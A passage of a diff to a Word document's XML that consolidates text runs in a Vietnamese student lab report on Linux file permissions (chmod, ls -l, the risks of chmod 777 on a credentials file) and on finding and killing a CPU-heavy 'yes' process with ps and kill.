+        <w:t>Chmod là quan trọng nhất vì nó trực tiếp thay đổi quyền của tệp tin. Tiếp theo ls –l xác minh xem quyền đã diễn ra đúng ý chưa.</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- Output </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chú</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ý?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Chuỗi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ký</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tự</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phân</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Output nào cần chú ý?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Chuỗi ký tự phân quyền</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-        <w:t>- Có r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ủ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">i </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ro</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Chmod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 777 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cực</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kỳ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nghiêm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trọng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>vì</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cho</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phép</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tất</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cả</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mọi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>người</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thể</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đọc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ghi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>và</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thực</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tệp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhạy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cảm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>như</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> creds.txt</w:t>
+        <w:t>- Có rủi ro bảo mật nào?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Chmod 777 cực kỳ nghiêm trọng vì  cho phép tất cả mọi người có thể đọc, ghi và thực thi tệp nhạy cảm như creds.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Lộ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thông</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> tin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sửa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đổi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trái</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phép</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ Leo thang </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đặc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>+ Lộ thông tin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Sửa đổi trái phép</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Leo thang đặc quyền</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ố</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t thì c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">n </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>x</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ử</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lý</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gì</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thêm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Không</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lưu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> plain text</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Áp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dụng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nguyên</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tắc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đặuc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thiểu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Kiểm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Owner/Group</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Giám</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sát</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Không lưu plain text</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Áp dụng nguyên tắc đặuc quyền tối thiểu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Kiểm tra Owner/Group</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Giám sát</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2793,6 +513,7 @@
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:noProof/>
           <w:color w:val="auto"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
@@ -2844,13 +565,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c tiêu:</w:t>
+        <w:t>Mục tiêu:</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -2859,25 +574,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Các bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n:</w:t>
+        <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2885,19 +582,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 1: T</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o process ăn CPU</w:t>
+        <w:t>Bước 1: Tạo process ăn CPU</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2907,6 +592,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FBD212" wp14:editId="5842A4CF">
             <wp:extent cx="3677163" cy="438211"/>
@@ -2949,19 +637,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 2: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra CPU</w:t>
+        <w:t>Bước 2: Kiểm tra CPU</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2974,6 +650,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="763D9D69" wp14:editId="11E28832">
@@ -3017,30 +696,19 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 3: Tìm process</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>ps aux --sort=-%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cpu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> | head</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>Bước 3: Tìm process</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ps aux --sort=-%cpu | head</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="748ADB02" wp14:editId="103FDE9C">
             <wp:extent cx="5486400" cy="611505"/>
@@ -3083,36 +751,19 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 4: L</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y PID</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">ps aux | </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>grep</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> yes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>Bước 4: Lấy PID</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ps aux | grep yes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6546119F" wp14:editId="154FB0D6">
             <wp:extent cx="5486400" cy="407035"/>
@@ -3155,13 +806,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 5: Kill process</w:t>
+        <w:t>Bước 5: Kill process</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3171,6 +816,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77DB357D" wp14:editId="2820BF68">
             <wp:extent cx="5163271" cy="628738"/>
@@ -3210,25 +858,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t qu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mong đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i:</w:t>
+        <w:t>Kết quả mong đợi:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3244,13 +874,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Tìm đư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c process yes</w:t>
+        <w:t>Tìm được process yes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3269,51 +893,7 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">- Command </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ọ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
+        <w:t>- Command nào quan trọng nhất?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3324,165 +904,16 @@
         <w:t>top</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>liên</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tục</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cập</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhật</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trạng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hệ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thống</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> liên tục cập nhật tình trạng hệ thống, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t>ps</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> aux </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>để</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lọc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>những</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tiến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đang</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
